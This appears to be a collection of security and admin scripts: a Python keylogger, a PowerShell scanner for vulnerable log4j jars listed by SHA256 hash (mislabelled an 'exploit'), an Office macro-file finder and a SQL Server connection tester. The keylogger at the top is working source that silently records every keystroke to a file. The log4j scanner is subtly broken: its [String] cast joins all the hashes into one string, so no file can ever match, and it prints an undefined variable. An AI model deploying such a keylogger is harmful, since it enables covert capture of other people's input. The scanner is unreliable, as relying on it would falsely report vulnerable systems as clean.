Basic Python Keylogger

from pynput.keyboard import Key, Listener
import logging

log_dir = ""

logging.basicConfig(filename=(log_dir + "keylogs.txt"), \
	level=logging.DEBUG, format='%(asctime)s: %(message)s')

def on_press(key):
    logging.info(str(key))

with Listener(on_press=on_press) as listener:
    listener.join()

Log4j Zero-Day Exploit

https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/apache-releases-log4j-version-2150-address-critical-rce

# If you find these hashes in you software inventory then you have the vulnerable log4j in your systems (SHA256)

# 2.X versions

bf4f41403280c1b115650d470f9b260a5c9042c04d9bcc2a6ca504a66379b2d6  ./apache-log4j-2.0-alpha2-bin/log4j-core-2.0-alpha2.jar
58e9f72081efff9bdaabd82e3b3efe5b1b9f1666cefe28f429ad7176a6d770ae  ./apache-log4j-2.0-beta1-bin/log4j-core-2.0-beta1.jar
ed285ad5ac6a8cf13461d6c2874fdcd3bf67002844831f66e21c2d0adda43fa4  ./apache-log4j-2.0-beta2-bin/log4j-core-2.0-beta2.jar
dbf88c623cc2ad99d82fa4c575fb105e2083465a47b84d64e2e1a63e183c274e  ./apache-log4j-2.0-beta3-bin/log4j-core-2.0-beta3.jar
a38ddff1e797adb39a08876932bc2538d771ff7db23885fb883fec526aff4fc8  ./apache-log4j-2.0-beta4-bin/log4j-core-2.0-beta4.jar
7d86841489afd1097576a649094ae1efb79b3147cd162ba019861dfad4e9573b  ./apache-log4j-2.0-beta5-bin/log4j-core-2.0-beta5.jar
4bfb0d5022dc499908da4597f3e19f9f64d3cc98ce756a2249c72179d3d75c47  ./apache-log4j-2.0-beta6-bin/log4j-core-2.0-beta6.jar
473f15c04122dad810c919b2f3484d46560fd2dd4573f6695d387195816b02a6  ./apache-log4j-2.0-beta7-bin/log4j-core-2.0-beta7.jar
b3fae4f84d4303cdbad4696554b4e8d2381ad3faf6e0c3c8d2ce60a4388caa02  ./apache-log4j-2.0-beta8-bin/log4j-core-2.0-beta8.jar
dcde6033b205433d6e9855c93740f798951fa3a3f252035a768d9f356fde806d  ./apache-log4j-2.0-beta9-bin/log4j-core-2.0-beta9.jar
85338f694c844c8b66d8a1b981bcf38627f95579209b2662182a009d849e1a4c  ./apache-log4j-2.0-bin/log4j-core-2.0.jar
db3906edad6009d1886ec1e2a198249b6d99820a3575f8ec80c6ce57f08d521a  ./apache-log4j-2.0-rc1-bin/log4j-core-2.0-rc1.jar
ec411a34fee49692f196e4dc0a905b25d0667825904862fdba153df5e53183e0  ./apache-log4j-2.0-rc2-bin/log4j-core-2.0-rc2.jar
a00a54e3fb8cb83fab38f8714f240ecc13ab9c492584aa571aec5fc71b48732d  ./apache-log4j-2.0.1-bin/log4j-core-2.0.1.jar
c584d1000591efa391386264e0d43ec35f4dbb146cad9390f73358d9c84ee78d  ./apache-log4j-2.0.2-bin/log4j-core-2.0.2.jar
8bdb662843c1f4b120fb4c25a5636008085900cdf9947b1dadb9b672ea6134dc  ./apache-log4j-2.1-bin/log4j-core-2.1.jar
c830cde8f929c35dad42cbdb6b28447df69ceffe99937bf420d32424df4d076a  ./apache-log4j-2.2-bin/log4j-core-2.2.jar
6ae3b0cb657e051f97835a6432c2b0f50a651b36b6d4af395bbe9060bb4ef4b2  ./apache-log4j-2.3-bin/log4j-core-2.3.jar
535e19bf14d8c76ec00a7e8490287ca2e2597cae2de5b8f1f65eb81ef1c2a4c6  ./apache-log4j-2.4-bin/log4j-core-2.4.jar
42de36e61d454afff5e50e6930961c85b55d681e23931efd248fd9b9b9297239  ./apache-log4j-2.4.1-bin/log4j-core-2.4.1.jar
4f53e4d52efcccdc446017426c15001bb0fe444c7a6cdc9966f8741cf210d997  ./apache-log4j-2.5-bin/log4j-core-2.5.jar
df00277045338ceaa6f70a7b8eee178710b3ba51eac28c1142ec802157492de6  ./apache-log4j-2.6-bin/log4j-core-2.6.jar
28433734bd9e3121e0a0b78238d5131837b9dbe26f1a930bc872bad44e68e44e  ./apache-log4j-2.6.1-bin/log4j-core-2.6.1.jar
cf65f0d33640f2cd0a0b06dd86a5c6353938ccb25f4ffd14116b4884181e0392  ./apache-log4j-2.6.2-bin/log4j-core-2.6.2.jar
5bb84e110d5f18cee47021a024d358227612dd6dac7b97fa781f85c6ad3ccee4  ./apache-log4j-2.7-bin/log4j-core-2.7.jar
ccf02bb919e1a44b13b366ea1b203f98772650475f2a06e9fac4b3c957a7c3fa  ./apache-log4j-2.8-bin/log4j-core-2.8.jar
815a73e20e90a413662eefe8594414684df3d5723edcd76070e1a5aee864616e  ./apache-log4j-2.8.1-bin/log4j-core-2.8.1.jar
10ef331115cbbd18b5be3f3761e046523f9c95c103484082b18e67a7c36e570c  ./apache-log4j-2.8.2-bin/log4j-core-2.8.2.jar
dc815be299f81c180aa8d2924f1b015f2c46686e866bc410e72de75f7cd41aae  ./apache-log4j-2.9.0-bin/log4j-core-2.9.0.jar
9275f5d57709e2204900d3dae2727f5932f85d3813ad31c9d351def03dd3d03d  ./apache-log4j-2.9.1-bin/log4j-core-2.9.1.jar
f35ccc9978797a895e5bee58fa8c3b7ad6d5ee55386e9e532f141ee8ed2e937d  ./apache-log4j-2.10.0-bin/log4j-core-2.10.0.jar
5256517e6237b888c65c8691f29219b6658d800c23e81d5167c4a8bbd2a0daa3  ./apache-log4j-2.11.0-bin/log4j-core-2.11.0.jar
d4485176aea67cc85f5ccc45bb66166f8bfc715ae4a695f0d870a1f8d848cc3d  ./apache-log4j-2.11.1-bin/log4j-core-2.11.1.jar
3fcc4c1f2f806acfc395144c98b8ba2a80fe1bf5e3ad3397588bbd2610a37100  ./apache-log4j-2.11.2-bin/log4j-core-2.11.2.jar
057a48fe378586b6913d29b4b10162b4b5045277f1be66b7a01fb7e30bd05ef3  ./apache-log4j-2.12.0-bin/log4j-core-2.12.0.jar
5dbd6bb2381bf54563ea15bc9fbb6d7094eaf7184e6975c50f8996f77bfc3f2c  ./apache-log4j-2.12.1-bin/log4j-core-2.12.1.jar
c39b0ea14e7766440c59e5ae5f48adee038d9b1c7a1375b376e966ca12c22cd3  ./apache-log4j-2.13.0-bin/log4j-core-2.13.0.jar
6f38a25482d82cd118c4255f25b9d78d96821d22bab498cdce9cda7a563ca992  ./apache-log4j-2.13.1-bin/log4j-core-2.13.1.jar
54962835992e303928aa909730ce3a50e311068c0960c708e82ab76701db5e6b  ./apache-log4j-2.13.2-bin/log4j-core-2.13.2.jar
e5e9b0f8d72f4e7b9022b7a83c673334d7967981191d2d98f9c57dc97b4caae1  ./apache-log4j-2.13.3-bin/log4j-core-2.13.3.jar
68d793940c28ddff6670be703690dfdf9e77315970c42c4af40ca7261a8570fa  ./apache-log4j-2.14.0-bin/log4j-core-2.14.0.jar
9da0f5ca7c8eab693d090ae759275b9db4ca5acdbcfe4a63d3871e0b17367463  ./apache-log4j-2.14.1-bin/log4j-core-2.14.1.jar
006fc6623fbb961084243cfc327c885f3c57f2eba8ee05fbc4e93e5358778c85  ./log4j-2.0-alpha1/log4j-core-2.0-alpha1.jar



# Possibly Vulnerable 1.x

9f5f5799707881451a39c1b2dd22b4e43b97a80698db7daf1c9697f545e24387  ./apache-log4j-1.2.15/log4j-1.2.15.jar
47351e6cafed77a4bcc8871f4fcc017ae62fcf6eb286862c4963e288d9a02ffc  ./apache-log4j-1.2.16/log4j-1.2.16.jar
a2234476879b9e76f99a561f3d9da243684edb54b0b44ef7c0cf7a1a3d1e6776  ./apache-log4j-1.2.17/log4j-1.2.17.jar
4e148a5018f7d1366680f2e8843222b24ad2752f4594eeeb4617d5ef2fced555  ./jakarta-log4j-1.0.4/log4j.jar
0e40a74639ad4ffe9c066696a221dda505d36c59fc9bd4c56625da1c696d6b0c  ./jakarta-log4j-1.0.4/log4j-core.jar
635d4be0003f9b24f560a7835db59fef04d1102bac75824c5f1c6ae48aa626a9  ./jakarta-log4j-1.1.3/dist/lib/log4j.jar
befc966efaff129ba622bb86a8f6788e8e65becc84e503eba11b5b83fcedff65  ./jakarta-log4j-1.1.3/dist/lib/log4j-core.jar
f9abe266a488b6b14c4ad4d65a5887d875fcbd0ff85ab515f17f01652c5c0f5e  ./jakarta-log4j-1.2beta4/dist/lib/log4j-1.2beta4.jar
57b8491b20b08fbe346bdd258b01186d2fd376bd3cbde74c1d13448396a638da  ./jakarta-log4j-1.2rc1/dist/lib/log4j-1.2rc1.jar
ec5ff8fc4b74a9edd65f49e4cd8fea1acad2f4491c36d1975f7551ebe400bb5c  ./jakarta-log4j-1.2.1/dist/lib/log4j-1.2.1.jar
d012436776129418f448e0f6efaa23eba3099187c2c81e5758a528ff14515253  ./jakarta-log4j-1.2.2/dist/lib/log4j-1.2.2.jar
6532c7056c610e4ca7491edfc7daf0ca377582e84c683be5950b1917b3da0efd  ./jakarta-log4j-1.2.3/dist/lib/log4j-1.2.3.jar
a621e49ebe90457c4c0c96e58e3c59ce5c730e1ed6e7685d46828d0dae089c94  ./jakarta-log4j-1.2.4/dist/lib/log4j-1.2.4.jar
7ccd71557650d5b8b2e78a9ec0810a8d1376404fb0bec505475622dd13733c14  ./jakarta-log4j-1.2.5/dist/lib/log4j-1.2.5.jar
de9639bbf4179bf880e9649fc7e92b8fa6875212e9d1bcbb59dee8707cb17832  ./jakarta-log4j-1.2.6/dist/lib/log4j-1.2.6.jar
aa04b7d49d0c4c3c2d4605a3dda1796c440a1fdf1ea99d6fe2931ca3986dfd35  ./jakarta-log4j-1.2.7/dist/lib/log4j-1.2.7.jar
c316595a68f7bc74ee0931e0c4435481cdeddc91c95d2cb78eada107c5b01a65  ./jakarta-log4j-1.2.8/dist/lib/log4j-1.2.8.jar
d2b9dfb297bcaa7be1fcdd702642a9c9713d7847dca8704e9c15bd829f0ab1bf  ./logging-log4j-1.2.9/dist/lib/log4j-1.2.9.jar
8a6bc785a8e52a97ea76d7e21e591526222669c4262ed7b91daa9c72fcf6cd07  ./logging-log4j-1.2.11/dist/lib/log4j-1.2.11.jar
dc67378cf428c06408e7959e83bdc1518dd22ccd313e7c28a986612d65c276c7  ./logging-log4j-1.2.12/dist/lib/log4j-1.2.12.jar
c8ed615889a62d7957c4ea44b0d1d290b9f308c88edabac325526957259d7f14  ./logging-log4j-1.2.13/dist/lib/log4j-1.2.13.jar
e3bff9ab64a09b1ac2800f3b5fb1e3d99728064acb6dd3924938507638a404fb  ./logging-log4j-1.2.14/dist/lib/log4j-1.2.14.jar
c15e6684b27e21f3c764907e39766a9b43fca7484abcdc0911ce9c6d5e6395cc  ./logging-log4j-1.3alpha-1/log4j-1.3alpha-1.jar
41487586711f83071ae22e4c155d0d5e90b3edd795eca2298b3ef0bbfe734fc6  ./logging-log4j-1.3alpha-3/log4j-1.3alpha-3.jar
9be3ac4a9363ec30fd3660bf0d9f2a80a2b7ece62e8b33ffe8f941c49b965c77  ./logging-log4j-1.3alpha-5/log4j-1.3alpha-5.jar
41d45530a2c44af8eb58701441d93a202ef0cd0185a4c02903e67f98b53dac6d  ./logging-log4j-1.3alpha-6/log4j-1.3alpha-6.jar
fe8de070123ffa8bb5c7490671de80ba23fd90cc8a199483b96d08699fc59d9e  ./logging-log4j-1.3alpha-7/log4j-1.3alpha-7.jar
b12788f04f503ac30b24333547546abdd16d5d54f6f20ecc7c49cc25676ded1a  ./logging-log4j-1.3alpha-8/lib/log4j-1.3alpha-8.jar
50a4f73c4d6e7ffe836b4cfec8fd45656862c27901973cb6d1d9fcd0573e1094  ./logging-log4j-1.3alpha-8/lib/log4j-all-1.3alpha-8.jar
035c6dd31d8c1418ce3e1cfa8adff5ea2c86d0a166653bfdc356d140c3607363  ./logging-log4j-1.3alpha-8/lib/log4j-nt-1.3alpha-8.jar
# Purpose: This snippet of PowerShell is designed to identify if you're vulnerable for the Apache Log4j critical RCE
#
# How it works: Simple ForEach loop that looks for known infected files via SHA256 file hash related to the Apache Log4j critical RCE.
#
# References: 
# https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/apache-releases-log4j-version-2150-address-critical-rce
#        
#
#
#
# Author: Brandon Lanczak
# Contact: Brandon@Lanczak.com
#
# Notes: 
#     -Scope to run against all volumes.
#     -Run as an administrator to ensure it can access all files.
#
# Revision: v1.0 | 12-10-2021 @ 20:51 CST
#
# Execution:
[String] $HashToFind = 'bf4f41403280c1b115650d470f9b260a5c9042c04d9bcc2a6ca504a66379b2d6',
'58e9f72081efff9bdaabd82e3b3efe5b1b9f1666cefe28f429ad7176a6d770ae',
'ed285ad5ac6a8cf13461d6c2874fdcd3bf67002844831f66e21c2d0adda43fa4',
'dbf88c623cc2ad99d82fa4c575fb105e2083465a47b84d64e2e1a63e183c274e',
'a38ddff1e797adb39a08876932bc2538d771ff7db23885fb883fec526aff4fc8',
'7d86841489afd1097576a649094ae1efb79b3147cd162ba019861dfad4e9573b',
'4bfb0d5022dc499908da4597f3e19f9f64d3cc98ce756a2249c72179d3d75c47',
'473f15c04122dad810c919b2f3484d46560fd2dd4573f6695d387195816b02a6',
'b3fae4f84d4303cdbad4696554b4e8d2381ad3faf6e0c3c8d2ce60a4388caa02',
'dcde6033b205433d6e9855c93740f798951fa3a3f252035a768d9f356fde806d',
'85338f694c844c8b66d8a1b981bcf38627f95579209b2662182a009d849e1a4c',
'db3906edad6009d1886ec1e2a198249b6d99820a3575f8ec80c6ce57f08d521a',
'ec411a34fee49692f196e4dc0a905b25d0667825904862fdba153df5e53183e0',
'a00a54e3fb8cb83fab38f8714f240ecc13ab9c492584aa571aec5fc71b48732d',
'c584d1000591efa391386264e0d43ec35f4dbb146cad9390f73358d9c84ee78d',
'8bdb662843c1f4b120fb4c25a5636008085900cdf9947b1dadb9b672ea6134dc',
'c830cde8f929c35dad42cbdb6b28447df69ceffe99937bf420d32424df4d076a',
'6ae3b0cb657e051f97835a6432c2b0f50a651b36b6d4af395bbe9060bb4ef4b2',
'535e19bf14d8c76ec00a7e8490287ca2e2597cae2de5b8f1f65eb81ef1c2a4c6',
'42de36e61d454afff5e50e6930961c85b55d681e23931efd248fd9b9b9297239',
'4f53e4d52efcccdc446017426c15001bb0fe444c7a6cdc9966f8741cf210d997',
'df00277045338ceaa6f70a7b8eee178710b3ba51eac28c1142ec802157492de6',
'28433734bd9e3121e0a0b78238d5131837b9dbe26f1a930bc872bad44e68e44e',
'cf65f0d33640f2cd0a0b06dd86a5c6353938ccb25f4ffd14116b4884181e0392',
'5bb84e110d5f18cee47021a024d358227612dd6dac7b97fa781f85c6ad3ccee4',
'ccf02bb919e1a44b13b366ea1b203f98772650475f2a06e9fac4b3c957a7c3fa',
'815a73e20e90a413662eefe8594414684df3d5723edcd76070e1a5aee864616e',
'10ef331115cbbd18b5be3f3761e046523f9c95c103484082b18e67a7c36e570c',
'dc815be299f81c180aa8d2924f1b015f2c46686e866bc410e72de75f7cd41aae',
'9275f5d57709e2204900d3dae2727f5932f85d3813ad31c9d351def03dd3d03d',
'f35ccc9978797a895e5bee58fa8c3b7ad6d5ee55386e9e532f141ee8ed2e937d',
'5256517e6237b888c65c8691f29219b6658d800c23e81d5167c4a8bbd2a0daa3',
'd4485176aea67cc85f5ccc45bb66166f8bfc715ae4a695f0d870a1f8d848cc3d',
'3fcc4c1f2f806acfc395144c98b8ba2a80fe1bf5e3ad3397588bbd2610a37100',
'057a48fe378586b6913d29b4b10162b4b5045277f1be66b7a01fb7e30bd05ef3',
'5dbd6bb2381bf54563ea15bc9fbb6d7094eaf7184e6975c50f8996f77bfc3f2c',
'c39b0ea14e7766440c59e5ae5f48adee038d9b1c7a1375b376e966ca12c22cd3',
'6f38a25482d82cd118c4255f25b9d78d96821d22bab498cdce9cda7a563ca992',
'54962835992e303928aa909730ce3a50e311068c0960c708e82ab76701db5e6b',
'e5e9b0f8d72f4e7b9022b7a83c673334d7967981191d2d98f9c57dc97b4caae1',
'68d793940c28ddff6670be703690dfdf9e77315970c42c4af40ca7261a8570fa',
'9da0f5ca7c8eab693d090ae759275b9db4ca5acdbcfe4a63d3871e0b17367463',
'006fc6623fbb961084243cfc327c885f3c57f2eba8ee05fbc4e93e5358778c85',
'9f5f5799707881451a39c1b2dd22b4e43b97a80698db7daf1c9697f545e24387',
'47351e6cafed77a4bcc8871f4fcc017ae62fcf6eb286862c4963e288d9a02ffc',
'a2234476879b9e76f99a561f3d9da243684edb54b0b44ef7c0cf7a1a3d1e6776',
'4e148a5018f7d1366680f2e8843222b24ad2752f4594eeeb4617d5ef2fced555',
'0e40a74639ad4ffe9c066696a221dda505d36c59fc9bd4c56625da1c696d6b0c',
'635d4be0003f9b24f560a7835db59fef04d1102bac75824c5f1c6ae48aa626a9',
'befc966efaff129ba622bb86a8f6788e8e65becc84e503eba11b5b83fcedff65',
'f9abe266a488b6b14c4ad4d65a5887d875fcbd0ff85ab515f17f01652c5c0f5e',
'57b8491b20b08fbe346bdd258b01186d2fd376bd3cbde74c1d13448396a638da',
'ec5ff8fc4b74a9edd65f49e4cd8fea1acad2f4491c36d1975f7551ebe400bb5c',
'd012436776129418f448e0f6efaa23eba3099187c2c81e5758a528ff14515253',
'6532c7056c610e4ca7491edfc7daf0ca377582e84c683be5950b1917b3da0efd',
'a621e49ebe90457c4c0c96e58e3c59ce5c730e1ed6e7685d46828d0dae089c94',
'7ccd71557650d5b8b2e78a9ec0810a8d1376404fb0bec505475622dd13733c14',
'de9639bbf4179bf880e9649fc7e92b8fa6875212e9d1bcbb59dee8707cb17832',
'aa04b7d49d0c4c3c2d4605a3dda1796c440a1fdf1ea99d6fe2931ca3986dfd35',
'c316595a68f7bc74ee0931e0c4435481cdeddc91c95d2cb78eada107c5b01a65',
'd2b9dfb297bcaa7be1fcdd702642a9c9713d7847dca8704e9c15bd829f0ab1bf',
'8a6bc785a8e52a97ea76d7e21e591526222669c4262ed7b91daa9c72fcf6cd07',
'dc67378cf428c06408e7959e83bdc1518dd22ccd313e7c28a986612d65c276c7',
'c8ed615889a62d7957c4ea44b0d1d290b9f308c88edabac325526957259d7f14',
'e3bff9ab64a09b1ac2800f3b5fb1e3d99728064acb6dd3924938507638a404fb',
'c15e6684b27e21f3c764907e39766a9b43fca7484abcdc0911ce9c6d5e6395cc',
'41487586711f83071ae22e4c155d0d5e90b3edd795eca2298b3ef0bbfe734fc6',
'9be3ac4a9363ec30fd3660bf0d9f2a80a2b7ece62e8b33ffe8f941c49b965c77',
'41d45530a2c44af8eb58701441d93a202ef0cd0185a4c02903e67f98b53dac6d',
'fe8de070123ffa8bb5c7490671de80ba23fd90cc8a199483b96d08699fc59d9e',
'b12788f04f503ac30b24333547546abdd16d5d54f6f20ecc7c49cc25676ded1a',
'50a4f73c4d6e7ffe836b4cfec8fd45656862c27901973cb6d1d9fcd0573e1094',
'035c6dd31d8c1418ce3e1cfa8adff5ea2c86d0a166653bfdc356d140c3607363'
 
Foreach ($file in Get-ChildItem C:\ -file -Recurse)
{
    If ((Get-FileHash $file.Fullname -Algorithm SHA256).hash -eq $HashToFind)
    {
        Write-Host "Vulnerable file found: $($File.Fullname) with hash $Hash"
        }
}
 
pause
 

Locate all files with macros

<#
.Synopsis
    Find all office documenta with Macros
.DESCRIPTION
    Find all office documents with Macros
.EXAMPLE
    Get a list of all documents with macros saved on a specific folder and format the result as a table.
    
    PS D:\> Get-FilesWithMacros "d:\" | ft

    Directory Name                               LastWriteTime         LastAccessTime        Length
    --------- ----                               -------------         --------------        ------
    D:\       Microsoft Excel Worksheet.xlsm 14/01/2021 5:45:27 PM 14/01/2021 8:43:17 PM   6164
    D:\        Microsoft Word Document.docm   14/01/2021 2:45:33 PM 14/01/2021 2:15:13 PM      0

.EXAMPLE
   Get-FilesWithMacro "c:\" | Export-CSV "Report_C_Drive_Files_with_Macro.csv"

   or

   (Get-PSDrive | ?{$_.Used -gt 0} ).Root | % {gfwm $_}| ft

.NOTE
   Author Brandon Lanczak | Brandon@Lanczak.com
   Requires -runasadministrator

#>
function Get-FilesWithMacros {
    [CmdletBinding()]
    [Alias('gfwm')]
    [OutputType([string])]
    Param
    (
        # Param1 help description
        [Parameter(Mandatory = $true,
            ValueFromPipelineByPropertyName = $true,
            Position = 0)]
        $folder
    
    )
    Begin
    {
    }
    Process
    {
        #List of all Office Documents Extensions with Macros enabled
        $macro_extensions = ".docm", ".dotm", ".xlsm",".xlm", ".xltm", ".xla", ".pptm", ".potm", ".ppsm", ".sldm"
        get-childitem -Path $folder -Recurse -ErrorAction SilentlyContinue|  Where-Object { $macro_extensions -contains $_.Extension} | Select-Object Directory, Name, LastWriteTime, LastAccessTime, Length 
    }
    End
    {
    }
}

Test SQL Connection

Function Test-SqlConnection
{
<# 
.SYNOPSIS 
 Tests a the connection to a single SQL instance.

.EXAMPLE
Test-SqlConnection DBServer01

#>    
    [CmdletBinding()]
    param (
        [Parameter(Mandatory = $true)]
        [Alias("ServerInstance", "SqlInstance")]
        [object]$SqlServer,
        [System.Management.Automation.PSCredential]$SqlCredential
    )
    
    
    # Get local enviornment
    Write-Output "Getting local enivornment information"
    $localinfo = @{ } | Select-Object Windows, PowerShell, CLR, SMO, DomainUser, RunAsAdmin
    $localinfo.Windows = [environment]::OSVersion.Version.ToString()
    $localinfo.PowerShell = $PSVersionTable.PSversion.ToString()
    $localinfo.CLR = $PSVersionTable.CLRVersion.ToString()
    $smo = (([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.Fullname -like "Microsoft.SqlServer.SMO,*" }).FullName -Split ", ")[1]
    $localinfo.SMO = $smo.TrimStart("Version=")
    $localinfo.DomainUser = $env:computername -ne $env:USERDOMAIN
    $localinfo.RunAsAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")
    
    # SQL Server
    if ($SqlServer.GetType() -eq [Microsoft.SqlServer.Management.Smo.Server]) { $SqlServer = $SqlServer.Name.ToString() }
    
    $serverinfo = @{ } | Select-Object ServerName, BaseName, InstanceName, AuthType, ConnectingAsUser, ConnectSuccess, SqlServerVersion, AddlConnectInfo, RemoteServer, IPAddress, NetBIOSname, RemotingAccessible, Pingable, DefaultSQLPortOpen, RemotingPortOpen
    
    $serverinfo.ServerName = $sqlserver
    
    Write-Output "Determining SQL Server base address"
    $baseaddress = $sqlserver.Split("\")[0]
    try { $instance = $sqlserver.Split("\")[1] }
    catch { $instance = "(Default)" }
    if ($instance -eq $null) { $instance = "(Default)" }
    
    if ($baseaddress -eq "." -or $baseaddress -eq $env:COMPUTERNAME)
    {
        $ipaddr = "."
        $hostname = $env:COMPUTERNAME
        $baseaddress = $env:COMPUTERNAME
    }
    
    $serverinfo.BaseName = $baseaddress
    $remote = $baseaddress -ne $env:COMPUTERNAME
    $serverinfo.InstanceName = $instance
    $serverinfo.RemoteServer = $remote
    
    Write-Output "Resolving IP address"
    try
    {
        $hostentry = [System.Net.Dns]::GetHostEntry($baseaddress)
        $ipaddr = ($hostentry.AddressList | Where-Object { $_ -notlike '169.*' } | Select-Object -First 1).IPAddressToString
    }
    catch { $ipaddr = "Unable to resolve" }
    
    $serverinfo.IPAddress = $ipaddr
    
    Write-Output "Resolving NetBIOS name"
    try
    {
        $hostname = (Get-WmiObject -Class Win32_NetworkAdapterConfiguration -Filter IPEnabled=TRUE -ComputerName $ipaddr -ErrorAction SilentlyContinue).PSComputerName
        if ($hostname -eq $null) { $hostname = (nbtstat -A $ipaddr | Where-Object { $_ -match '\<00\> UNIQUE' } | ForEach-Object { $_.SubString(4, 14) }).Trim() }
    }
    catch { $hostname = "Unknown" }
    
    $serverinfo.NetBIOSname = $hostname
    
    
    if ($remote -eq $true)
    {
        # Test for WinRM #Test-WinRM neh
        Write-Output "Checking remote acccess"
        winrm id -r:$hostname 2>$null | Out-Null
        if ($LastExitCode -eq 0) { $remoting = $true }
        else { $remoting = $false }
        
        $serverinfo.RemotingAccessible = $remoting
        
        Write-Output "Testing raw socket connection to PowerShell remoting port"
        $tcp = New-Object System.Net.Sockets.TcpClient
        try
        {
            $tcp.Connect($baseaddress, 135)
            $tcp.Close()
            $tcp.Dispose()
            $remotingport = $true
        }
        catch { $remotingport = $false }
        
        $serverinfo.RemotingPortOpen = $remotingport
    }
    
    # Test Connection first using Test-Connection which requires ICMP access then failback to tcp if pings are blocked
    Write-Output "Testing ping to $baseaddress"
    $testconnect = Test-Connection -ComputerName $baseaddress -Count 1 -Quiet
    
    $serverinfo.Pingable = $testconnect
    
    # SQL Server connection
    
    if ($instance -eq "(Default)")
    {
        Write-Output "Testing raw socket connection to default SQL port"
        $tcp = New-Object System.Net.Sockets.TcpClient
        try
        {
            $tcp.Connect($baseaddress, 1433)
            $tcp.Close()
            $tcp.Dispose()
            $sqlport = $true
        }
        catch { $sqlport = $false }
        $serverinfo.DefaultSQLPortOpen = $sqlport
    }
    else { $serverinfo.DefaultSQLPortOpen = "N/A" }
    
    $server = New-Object Microsoft.SqlServer.Management.Smo.Server $SqlServer
    
    try
    {
        if ($SqlCredential -ne $null)
        {
            $username = ($SqlCredential.username).TrimStart("\")

            if ($username -like "*\*")
            {
                $username = $username.Split("\")[1]
                $authtype = "Windows Authentication with Credential"
                $server.ConnectionContext.LoginSecure = $true
                $server.ConnectionContext.ConnectAsUser = $true
                $server.ConnectionContext.ConnectAsUserName = $username
                $server.ConnectionContext.ConnectAsUserPassword = ($SqlCredential).GetNetworkCredential().Password
            }
            else
            {
                $authtype = "SQL Authentication"
                $server.ConnectionContext.LoginSecure = $false
                $server.ConnectionContext.set_Login($username)
                $server.ConnectionContext.set_SecurePassword($SqlCredential.Password)
            }
        }
        else
        {
            $authtype = "Windows Authentication (Trusted)"
            $username = "$env:USERDOMAIN\$env:username"
        }
    }
    catch
    {
        Write-Exception $_
        $authtype = "Windows Authentication (Trusted)"
        $username = "$env:USERDOMAIN\$env:username"
    }
    
    $serverinfo.ConnectingAsUser = $username
    $serverinfo.AuthType = $authtype
    
    
    Write-Output "Attempting to connect to $SqlServer as $username "
    try
    {
        $server.ConnectionContext.ConnectTimeout = 10
        $server.ConnectionContext.Connect()
        $connectSuccess = $true
        $version = $server.Version.ToString()
        $addlinfo = "N/A"
        $server.ConnectionContext.Disconnect()
    }
    catch
    {
        $connectSuccess = $false
        $version = "N/A"
        $addlinfo = $_.Exception
    }
    
    $serverinfo.ConnectSuccess = $connectSuccess
    $serverinfo.SqlServerVersion = $version
    $serverinfo.AddlConnectInfo = $addlinfo
    
    Write-Output "`nLocal PowerShell Enviornment"
    $localinfo | Select-Object Windows, PowerShell, CLR, SMO, DomainUser, RunAsAdmin
    
    Write-Output "SQL Server Connection Information`n"
    $serverinfo | Select-Object ServerName, BaseName, InstanceName, AuthType, ConnectingAsUser, ConnectSuccess, SqlServerVersion, AddlConnectInfo, RemoteServer, IPAddress, NetBIOSname, RemotingAccessible, Pingable, DefaultSQLPortOpen, RemotingPortOpen
    
}